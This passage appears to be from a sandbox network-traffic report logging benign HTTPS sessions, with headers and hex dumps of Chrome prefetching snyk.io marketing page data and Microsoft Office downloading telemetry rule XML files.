                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              100192.168.2.54985023.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC658OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/government-security-solution.json?slug=government-security-solution HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC641INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"10a55clfdau13tv"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/government-security-solution.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::tvkvz-1729799352014-3a7d993a028a
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:12 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799351.1f611fc
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC15743INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 35 4d 50 79 76 30 32 6e 41 6e 4f 73 32 76 5a 78 54 74 49 4e 49 47 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 39 54 32 31 3a 34 38 3a 32 32 2e 31 37 39 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 32 34 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5MPyv02nAnOs2vZxTtINIG","type":"Entry","createdAt":"2022-11-09T21:48:22.179Z","updatedAt":"2024-07-24T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC15960INData Raw: 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 53 6e 79 6b 20 68 65 6c 70 73 20 73 61 74 69 73 66 79 20 74 68 65 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 2f 62 6c 6f 67 2f 62 69 64 65 6e 2d 61 69 2d 73 61 66 65 74 79 2d 65 78 65 63 75 74 69 76 65 2d 6f 72 64 65 72 2f 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 75 6e 64 65 72 6c 69 6e 65 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 57 68
                                                                                                                                                                                                                                                                                                              Data Ascii: ,"description":{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[],"value":"Snyk helps satisfy the ","nodeType":"text"},{"data":{"uri":"/blog/biden-ai-safety-executive-order/"},"content":[{"data":{},"marks":[{"type":"underline"}],"value":"Wh
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC16384INData Raw: 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 68 61 6e 64 62 6f 6f 6b 22 7d 7d 7d 5d 7d 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 34 72 4e 5a 30 50 55 49 78 49 30 47 4e 63 6c 41 61 30 69 58 42 69 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 22 2c 22 72 6f 77 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 34 4e 54 51 51 61 78 50 44 52 41 57 33 45 37 50 37 45 74 69 4f 70 22
                                                                                                                                                                                                                                                                                                              Data Ascii: ":{"navItem":{"icon":"handbook"}}}]}}]}},{"sys":{"id":"4rNZ0PUIxI0GNclAa0iXBi","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumn","rows":{"__typename":"NavigationDropdownMenuColumnRowsCollection","items":[{"sys":{"id":"4NTQQaxPDRAW3E7P7EtiOp"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC1077INData Raw: 3a 7b 22 69 64 22 3a 22 34 4d 77 68 31 33 42 57 50 73 35 6f 4e 76 51 62 75 4f 41 72 69 30 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 46 6f 6f 74 65 72 43 61 74 65 67 6f 72 79 22 2c 22 6c 61 62 65 6c 22 3a 22 4f 75 72 20 52 65 73 6f 75 72 63 65 73 22 2c 22 66 6f 6f 74 65 72 4e 61 76 49 74 65 6d 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 46 6f 6f 74 65 72 43 61 74 65 67 6f 72 79 49 74 65 6d 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 36 50 76 36 61 64 47 4f 57 6e 74 33 62 58 5a 6d 35 72 42 76 63 31 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d
                                                                                                                                                                                                                                                                                                              Data Ascii: :{"id":"4Mwh13BWPs5oNvQbuOAri0","__typename":"Sys"},"__typename":"NavigationFooterCategory","label":"Our Resources","footerNavItems":{"__typename":"NavigationFooterCategoryItemsCollection","items":[{"sys":{"id":"6Pv6adGOWnt3bXZm5rBvc1","__typename":"Sys"}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC2502INData Raw: 30 30 30 30 30 39 42 41 0d 0a 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 53 6e 79 6b 20 55 73 65 72 20 44 6f 63 73 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 73 6e 79 6b 2e 69 6f 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 37 42 52 73 5a 6d 66 6e 30 65 48 4b 32 74 57 70 4d 55 41 42 32 65 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 53 6e 79 6b 20 53 75 70 70 6f 72 74 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 73 6e 79 6b 2e 69 6f 2f 68 63 2f 65 6e 2d 75 73 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 000009BAavigationItem","label":"Snyk User Docs","url":"https://docs.snyk.io/"},{"sys":{"id":"7BRsZmfn0eHK2tWpMUAB2e","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Snyk Support","url":"https://support.snyk.io/hc/en-us"},{"sys":{"id":"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              101192.168.2.54986413.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:11 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 4cd68789-d01e-0017-448e-21b035000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194911Z-16849878b78p6ttkmyustyrk8s000000083g000000007c9h
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              102192.168.2.54986113.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:11 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 469
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 847e2871-001e-0079-66e3-2112e8000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194911Z-16849878b78j5kdg3dndgqw0vg000000013000000000y527
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              103192.168.2.54986313.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:11 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 464
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 389dace0-b01e-003d-533d-26d32c000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194911Z-r197bdfb6b4g24ztpxkw4umce800000000wg00000000ypfm
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              104192.168.2.54986523.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC657OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/lp/securing-ai-generated-code.json?slug=securing-ai-generated-code HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC582INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"2r7hvn8lfv5xb"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/lp/[slug].json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::9gvlp-1729799352389-150f7ffdfc69
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:12 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 7696
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799352.1f61287
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC7696INData Raw: 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 54 61 67 22 2c 22 69 64 22 3a 22 64 69 73 70 6c 61 79 4f 6e 53 65 63 75 72 69 74 79 52 65 73 6f 75 72 63 65 73 50 61 67 65 22 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 54 61 67 22 2c 22 69 64 22 3a 22 74 6f 70 69 63 41 69 22 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 54 61 67 22 2c 22 69 64 22 3a 22 74 6f 70 69 63 41 70 70 6c 69 63 61 74 69 6f 6e 53 65 63 75 72 69 74 79 22 7d 7d 2c 7b 22 73 79 73
                                                                                                                                                                                                                                                                                                              Data Ascii: {"pageProps":{"page":{"metadata":{"tags":[{"sys":{"type":"Link","linkType":"Tag","id":"displayOnSecurityResourcesPage"}},{"sys":{"type":"Link","linkType":"Tag","id":"topicAi"}},{"sys":{"type":"Link","linkType":"Tag","id":"topicApplicationSecurity"}},{"sys


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              105192.168.2.54986723.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC612OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/resource-library.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC507INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Server: Vercel
